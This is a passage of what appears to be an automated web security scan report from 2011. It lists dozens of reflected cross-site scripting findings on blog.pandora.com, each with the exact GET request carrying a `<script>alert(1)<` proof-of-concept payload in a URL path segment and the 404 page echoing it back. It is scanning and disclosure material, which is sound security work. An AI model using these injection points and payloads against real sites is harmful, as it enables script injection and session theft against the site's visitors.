GET /faqc9edc<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:58 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 328 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /faqc9edc<script>alert(1)< ...[SNIP]... |
3.17. http://blog.pandora.com/faq/index.xml [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /faq/index.xml |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 21a51<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /faq21a51<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:30 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 337 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /faq21a51<script>alert(1)< ...[SNIP]... |
3.18. http://blog.pandora.com/faq/index.xml [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /faq/index.xml |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d7f75<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /faq/index.xmld7f75<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:33 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 337 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /faq/index.xmld7f75<script>alert(1)< ...[SNIP]... |
3.19. http://blog.pandora.com/jobs [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /jobs |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1bab7<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jobs1bab7<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:07:28 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 328 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /jobs1bab7<script>alert(1)< ...[SNIP]... |
3.20. http://blog.pandora.com/pandora/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/ |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8a2e2<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora8a2e2<script>alert(1)< Host: blog.pandora.com Proxy-Connection: keep-alive Referer: http://blog.pandora.com/ Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:34 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Type: text/html Content-Length: 332 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora8a2e2<script>alert(1)< ...[SNIP]... |
3.21. http://blog.pandora.com/pandora/archives/2005/07/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2005/07 |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 95a59<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora95a59<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:27 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora95a59<script>alert(1)< ...[SNIP]... |
3.22. http://blog.pandora.com/pandora/archives/2005/07/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2005/07 |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4a534<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives4a534<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:29 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 348 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives4a534<script>alert(1)< ...[SNIP]... |
3.23. http://blog.pandora.com/pandora/archives/2005/07/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2005/07 |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8b191<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20058b191<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:32 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 349 Connection: close Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20058b191<script>alert(1)< ...[SNIP]... |
3.24. http://blog.pandora.com/pandora/archives/2005/07/ [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2005/07 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6552d<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2005/076552d<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:35 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2005/076552d<script>alert(1)< ...[SNIP]... |
3.25. http://blog.pandora.com/pandora/archives/2005/08/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2005/08 |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1adf9<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora1adf9<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:26 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora1adf9<script>alert(1)< ...[SNIP]... |
3.26. http://blog.pandora.com/pandora/archives/2005/08/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2005/08 |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 55147<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives55147<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:28 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives55147<script>alert(1)< ...[SNIP]... |
3.27. http://blog.pandora.com/pandora/archives/2005/08/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2005/08 |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 79994<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/200579994<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:30 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/200579994<script>alert(1)< ...[SNIP]... |
3.28. http://blog.pandora.com/pandora/archives/2005/08/ [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2005/08 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8db7f<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2005/088db7f<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:34 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2005/088db7f<script>alert(1)< ...[SNIP]... |
3.29. http://blog.pandora.com/pandora/archives/2005/09/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2005/09 |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b3b98<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorab3b98<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:25 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandorab3b98<script>alert(1)< ...[SNIP]... |
3.30. http://blog.pandora.com/pandora/archives/2005/09/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2005/09 |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9f14e<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives9f14e<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:27 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives9f14e<script>alert(1)< ...[SNIP]... |
3.31. http://blog.pandora.com/pandora/archives/2005/09/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2005/09 |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 85944<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/200585944<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:29 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/200585944<script>alert(1)< ...[SNIP]... |
3.32. http://blog.pandora.com/pandora/archives/2005/09/ [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2005/09 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b19b6<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2005/09b19b6<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:33 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2005/09b19b6<script>alert(1)< ...[SNIP]... |
3.33. http://blog.pandora.com/pandora/archives/2005/11/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2005/11 |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 73e85<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora73e85<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:24 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora73e85<script>alert(1)< ...[SNIP]... |
3.34. http://blog.pandora.com/pandora/archives/2005/11/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2005/11 |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 52080<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives52080<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:27 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives52080<script>alert(1)< ...[SNIP]... |
3.35. http://blog.pandora.com/pandora/archives/2005/11/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2005/11 |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f1a55<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2005f1a55<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:29 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2005f1a55<script>alert(1)< ...[SNIP]... |
3.36. http://blog.pandora.com/pandora/archives/2005/11/ [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2005/11 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f891c<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2005/11f891c<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:32 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2005/11f891c<script>alert(1)< ...[SNIP]... |
3.37. http://blog.pandora.com/pandora/archives/2005/12/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2005/12 |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 812a3<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora812a3<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:23 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora812a3<script>alert(1)< ...[SNIP]... |
3.38. http://blog.pandora.com/pandora/archives/2005/12/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2005/12 |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bb8f3<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesbb8f3<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:25 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 349 Connection: close Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesbb8f3<script>alert(1)< ...[SNIP]... |
3.39. http://blog.pandora.com/pandora/archives/2005/12/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2005/12 |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 97499<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/200597499<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:28 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/200597499<script>alert(1)< ...[SNIP]... |
3.40. http://blog.pandora.com/pandora/archives/2005/12/ [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2005/12 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d6250<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2005/12d6250<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:30 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2005/12d6250<script>alert(1)< ...[SNIP]... |
3.41. http://blog.pandora.com/pandora/archives/2006/01/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2006/01 |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 176cf<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora176cf<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:22 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 348 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora176cf<script>alert(1)< ...[SNIP]... |
3.42. http://blog.pandora.com/pandora/archives/2006/01/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2006/01 |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a4d2d<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesa4d2d<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:25 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesa4d2d<script>alert(1)< ...[SNIP]... |
3.43. http://blog.pandora.com/pandora/archives/2006/01/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2006/01 |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b5cfe<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006b5cfe<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:27 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2006b5cfe<script>alert(1)< ...[SNIP]... |
3.44. http://blog.pandora.com/pandora/archives/2006/01/ [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2006/01 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 86220<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006/0186220<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:30 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 349 Connection: close Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2006/0186220<script>alert(1)< ...[SNIP]... |
3.45. http://blog.pandora.com/pandora/archives/2006/02/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2006/02 |
Issue detail
